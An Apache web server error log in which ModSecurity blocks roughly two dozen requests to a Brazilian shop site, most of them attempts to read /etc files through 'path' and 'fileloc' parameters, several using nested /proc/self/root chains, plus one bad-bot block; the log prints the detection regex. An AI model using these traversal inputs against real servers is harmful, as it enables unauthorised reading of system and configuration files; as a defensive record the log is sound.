[Fri Mar 20 10:34:58.683560 2026] [:error] [pid 15826:tid 140411699963648] [client 57.141.18.100:51546] [client 57.141.18.100] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/dir_colors.256color"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/cassetete/roughage01438383918.phtml"] [unique_id "ab1NAuoXxyEfFpUF8f-gqAAAAUU"]
[Fri Mar 20 10:35:07.200483 2026] [:error] [pid 11167:tid 140411582465792] [client 57.141.18.7:52002] [client 57.141.18.7] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/sudo.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/throttle/superdreadnought012580787441.phtml"] [unique_id "ab1NC_HIg5MgXLBnicMWeAAAAdM"]
[Fri Mar 20 10:35:10.607078 2026] [:error] [pid 7235:tid 140411708356352] [client 57.141.18.116:52142] [client 57.141.18.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/dracut.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/throttle/superdreadnought012580787441.phtml"] [unique_id "ab1NDvqxLDW4GITHUkQKNwAAAQQ"]
[Fri Mar 20 10:35:15.139402 2026] [:error] [pid 26799:tid 140411741927168] [client 57.141.18.69:52278] [client 57.141.18.69] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/systemd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/throttle/superdreadnought012580787441.phtml"] [unique_id "ab1NE9a6ubjKNq_cu4b6BAAAA0A"]
[Fri Mar 20 10:35:31.114872 2026] [:error] [pid 10189:tid 140411624429312] [client 57.141.18.57:52902] [client 57.141.18.57] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/crypttab"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/throttle/superdreadnought012580787441.phtml"] [unique_id "ab1NIzJ3M9BSuKP7CAZDPQAAAI4"]
[Fri Mar 20 10:35:31.142625 2026] [:error] [pid 10189:tid 140411725141760] [client 57.141.18.91:52904] [client 57.141.18.91] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/init.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/throttle/superdreadnought012580787441.phtml"] [unique_id "ab1NIzJ3M9BSuKP7CAZDPgAAAII"]
[Fri Mar 20 10:35:31.468496 2026] [:error] [pid 10189:tid 140411599251200] [client 74.7.243.128:53952] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/my.cnf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1NIzJ3M9BSuKP7CAZDPwAAAJE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 10:35:32.356072 2026] [:error] [pid 31215:tid 140411683178240] [client 74.7.244.43:55474] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "ab1NJAF0L0L-SsrnPo6J1QAAAsc"]
[Fri Mar 20 10:35:49.296203 2026] [:error] [pid 7893:tid 140411582465792] [client 57.141.18.102:53340] [client 57.141.18.102] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/dir_colors.256color"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/piedmont/suthora012521478332.phtml"] [unique_id "ab1NMxCii7xarUs8iHaLJgAAAhM"]
[Fri Mar 20 10:35:52.463102 2026] [:error] [pid 11167:tid 140411725141760] [client 57.141.18.73:53514] [client 57.141.18.73] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/centos-release-upstream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/throttle/superdreadnought012580787441.phtml"] [unique_id "ab1NOPHIg5MgXLBnicMWkgAAAcI"]
[Fri Mar 20 10:35:59.818950 2026] [:error] [pid 15826:tid 140411565680384] [client 74.7.241.31:51402] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1NP-oXxyEfFpUF8f-hCwAAAVU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 10:36:03.087211 2026] [:error] [pid 7235:tid 140411649607424] [client 74.7.241.31:45100] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1NQvqxLDW4GITHUkQKZwAAAQs"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 10:36:06.079721 2026] [:error] [pid 31215:tid 140411708356352] [client 57.141.18.109:54452] [client 57.141.18.109] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/chkconfig.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/cassetete/roughage01438383918.phtml"] [unique_id "ab1NRgF0L0L-SsrnPo6J7wAAAsQ"]
[Fri Mar 20 10:36:07.619415 2026] [:error] [pid 11167:tid 140411557287680] [client 74.7.243.128:36640] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/zabbix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1NR_HIg5MgXLBnicMWqgAAAdY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 10:36:10.539014 2026] [:error] [pid 26799:tid 140411574073088] [client 74.7.241.31:45110] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1NSta6ubjKNq_cu4b6PAAAA1Q"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 10:36:12.121841 2026] [:error] [pid 11642:tid 140411582465792] [client 57.141.18.68:54684] [client 57.141.18.68] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/mime.types"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/piedmont/suthora012521478332.phtml"] [unique_id "ab1NSrninkcc-iUj5Ap-JAAAA5M"]
[Fri Mar 20 10:36:12.142054 2026] [:error] [pid 9818:tid 140411590858496] [client 57.141.18.11:54690] [client 57.141.18.11] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/asound.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/piedmont/suthora012521478332.phtml"] [unique_id "ab1NS11pVZ5mVmJwsFNQPgAAAFI"]
[Fri Mar 20 10:36:13.207720 2026] [:error] [pid 21219:tid 140411557287680] [client 74.7.241.31:56626] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/depmod.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1NTfXLqtnMIWvjpaK7nwAAApY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 10:36:15.194306 2026] [:error] [pid 21219:tid 140411607643904] [client 57.141.18.108:54826] [client 57.141.18.108] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/piedmont/suthora012521478332.phtml"] [unique_id "ab1NT_XLqtnMIWvjpaK7owAAApA"]
[Fri Mar 20 10:36:16.628128 2026] [:error] [pid 10189:tid 140411725141760] [client 74.7.241.31:56632] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1NUDJ3M9BSuKP7CAZDcwAAAII"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 10:36:17.039026 2026] [mime_magic:error] [pid 7893:tid 140411741927168] (70014)End of file found: [client 57.141.18.121:54880] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 10:36:19.063409 2026] [:error] [pid 7235:tid 140411607643904] [client 74.7.241.31:34452] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1NU_qxLDW4GITHUkQKfgAAARA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 10:36:20.404098 2026] [:error] [pid 11642:tid 140411641214720] [client 74.7.241.31:34454] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1NVLninkcc-iUj5Ap-LAAAA4w"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 10:36:21.540280 2026] [:error] [pid 11167:tid 140411557287680] [client 57.141.18.26:55134] [client 57.141.18.26] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/grep_colors"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/piedmont/suthora012521478332.phtml"] [unique_id "ab1NVfHIg5MgXLBnicMWugAAAdY"]
[Fri Mar 20 10:36:22.779891 2026] [:error] [pid 31215:tid 140411708356352] [client 74.7.241.31:34462] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/locaweb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1NVgF0L0L-SsrnPo6KCAAAAsQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 10:36:25.298910 2026] [:error] [pid 26799:tid 140411548894976] [client 74.7.241.31:34472] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1NWda6ubjKNq_cu4b6TgAAA1c"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 10:36:26.663168 2026] [:error] [pid 7893:tid 140411540502272] [client 57.141.18.47:55516] [client 57.141.18.47] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/my.cnf.rpmnew"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/throttle/superdreadnought012580787441.phtml"] [unique_id "ab1NWhCii7xarUs8iHaLVAAAAhg"]
